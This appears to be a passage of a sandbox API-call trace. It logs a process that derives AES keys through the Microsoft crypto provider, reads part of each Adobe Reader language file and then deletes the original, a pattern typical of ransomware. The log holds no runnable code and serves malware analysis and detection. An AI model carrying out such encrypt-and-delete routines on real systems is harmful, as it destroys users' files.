[0221.783] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.784] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.784] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.784] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.784] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x74c0 [0221.784] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.789] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.789] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.789] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.791] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs.txt")) returned 1 [0221.793] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.793] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.793] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.794] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.794] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x74c0 [0221.794] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.797] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.797] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.798] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.799] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs_CZ.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs_cz.txt")) returned 1 [0221.800] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.801] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.801] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.801] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.801] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6d72 [0221.801] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.822] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.822] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.822] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.823] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da.txt")) returned 1 [0221.860] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.861] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.861] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.861] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.861] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6d72 [0221.861] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.877] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.877] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.877] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.879] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da_DK.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da_dk.txt")) returned 1 [0221.880] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.881] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.881] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.881] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.881] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x72d6 [0221.881] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.893] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.893] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.893] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.894] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_CH.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_ch.txt")) returned 1 [0221.895] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.896] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.896] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.896] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.896] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7328 [0221.896] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.931] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.931] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.931] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.932] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de.txt")) returned 1 [0221.934] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.934] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.934] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.934] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.934] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7326 [0221.934] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.939] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.939] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.939] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.940] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de_preeuro.txt")) returned 1 [0221.943] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.944] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.944] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.944] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.944] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e92 [0221.944] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.955] CryptDestroyHash (hHash=0x284d768) returned 1 [0221.955] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.955] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.957] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el.txt")) returned 1 [0221.958] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.959] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.959] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.959] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.959] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e92 [0221.959] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0221.965] CryptDestroyHash (hHash=0x284d568) returned 1 [0221.965] CryptDestroyKey (hKey=0x284d728) returned 1 [0221.965] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0221.966] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr.txt")) returned 1 [0221.969] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0221.969] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0221.970] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0221.970] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0221.970] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e76 [0221.970] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.009] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.009] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.009] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.010] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr_preeuro.txt")) returned 1 [0222.012] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.013] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.013] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.013] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.013] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e88 [0222.013] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.037] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.037] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.037] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.039] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_CA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_ca.txt")) returned 1 [0222.041] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.041] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.041] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.041] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.041] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e88 [0222.042] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.050] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.050] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.050] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.051] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb.txt")) returned 1 [0222.053] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.054] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.054] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.054] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.054] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e88 [0222.054] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.069] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.069] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.069] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.070] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB_EURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb_euro.txt")) returned 1 [0222.074] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.075] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.075] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.075] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.075] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e88 [0222.075] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.083] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.083] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.083] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.084] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us.txt")) returned 1 [0222.085] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.086] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.086] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.086] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.086] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e88 [0222.086] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.213] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.213] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.213] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.215] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US_POSIX.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us_posix.txt")) returned 1 [0222.216] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.217] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.217] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.217] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.217] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec4 [0222.217] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.229] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.229] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.229] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.231] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es.txt")) returned 1 [0222.234] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.234] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.234] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.234] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.235] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.235] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.251] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.251] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.251] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.252] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_AR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ar.txt")) returned 1 [0222.254] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.254] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.254] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.254] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.254] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.254] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.436] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.436] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.436] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.437] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_BO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_bo.txt")) returned 1 [0222.439] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, 